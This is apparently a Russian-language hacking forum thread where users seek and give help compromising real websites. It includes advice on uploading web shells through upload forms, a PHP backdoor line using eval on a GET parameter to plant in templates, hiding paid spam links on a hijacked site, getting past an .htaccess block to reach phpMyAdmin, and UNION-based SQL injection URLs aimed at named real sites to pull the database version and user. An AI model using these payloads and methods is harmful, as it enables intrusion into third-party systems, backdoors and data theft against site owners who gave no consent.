Ваши вопросы по уязвимостям.

C помощью js шелл не зальешь, тк они выполняются на стороне клиента, залить можно (наверное), какой? Да который больше нравится, можно засунуть рекламу через шелл...

 

Сказал бы,что за кмс,если это не самопис то из админки известны способы заливки.
Если самопис какой-то,1.)ищи заливку картинок и пробуй загрузить шелл , 2.)Ищи место куда можно вставить пхп код и чтоб он исполнялся,например если в шаблонах разрешен пхп,то вставляешь туда пхп код например eval(stripslashes($_GET[e])); вызываешь пхпинфо,а дальше уже смотришь по ситуации...

 

TrinetCMS, тоесть пробывать заливать скрипты через всевозможные формы загрузки( фотографии, видео и т.д.). Так а не запилят банер? Есть смысл делать это через Sape, просто при анализе это сайта через http://www.cy-pr.com/, говорят что сапа отвалит больше 1000 $ , вот и решил попробовать.
А какой шелл посоветуете, есть какие-нибудь факи по ним?

 

губозакататель еще дадут бесплатный никелированный, если сапа даст больше 1к $, значит сайт с высоким тиц-ем, скорее всего он в сапе уже есть, если нет то за ним следят и спалят появление всяких ссылок очень быстро..

 

Яша 450
Google PageRank (PR) 5
Его нет в сапе, а если умело, может и не запилят?

 

если на сайте нет нормального админа, а только контент-менеджер который дальше админки ничего не знает то можно попробовать скрыть в шаблоне ссылки через display:none, но все же это палево все равно. вдруг завтра как раз решат поставить сапу на сайт а тут хоп - сайт уже в сапе ))

 

Ну посмотрим, а что такое display:none, типо реклама вида Hide, так сапа заблочит за это?!

 

Ладно, такой вопрос, если есть доступ через шел к папке phpmyadmin, а из адресной строки доступа нет(403 Forbidden), как открыть доступ к этой директории?

 

в этой папке или в корне есть .htaccess? может через него доступ закрыт.

 

Понял, поищу, спасибо!

 

Делаю запрос

Выходит такая ошибка:
Warning: array_merge() [function.array-merge]: Argument #2 is not an array

Если делаю так

Отображается страница с записями

если перед 2 минус ставлю

getData: Incorrect table name '' SQL=SELECT DISTINCT `` AS blabla FROM `` LIMIT 0, 10

Какой запрос сформировать?

Интересно что даже если делаю 1,2,3,4 и т.д.

данные отображаются

//обсуждение таких вопросов без указания линков, не эффективно..иногда даже без результата {модер}

 

Что за сайт-то?

 

у меня вопрос
www.truvor.ru/news.php?%20id_new=-91+union+select%20+1,2,3,4,5,6,7,8,9
как вывисти какиенибуть данные если всегда отображается только текст?

 

Смотри в title

http://www.truvor.ru/news.php?id_new=-91+union+select+1,2,3,4,version(),6,7,8,9--

 

Не получается вывести имя юзера.


http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+select+user,null,null,null,null,null,null,null,null,null,null,null+from+sys.dual--

http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+select+sys.login_user,null,null,null,null,null,null,null,null,null,null,null+from+sys.dual--

 

хи алл! народ помогите с Joomla 1.5.9 - сил ужо нет( ,какие у него дыры , хотяб статейку подкинте.
спс)

 

Делаю запрос

Все отлично показывает

А на вот такой

говорит

Как я понял тут фильтруется from или набодобие того как это обойти?

 

а погуглить влом?

 

попробуй указать базу где находится табличка users, если и так не сканает то скорее всего фильтр на from, попробуй подзапросами...

 

Табличку указывал не проканало, а как подзапросы делать можно примерчик?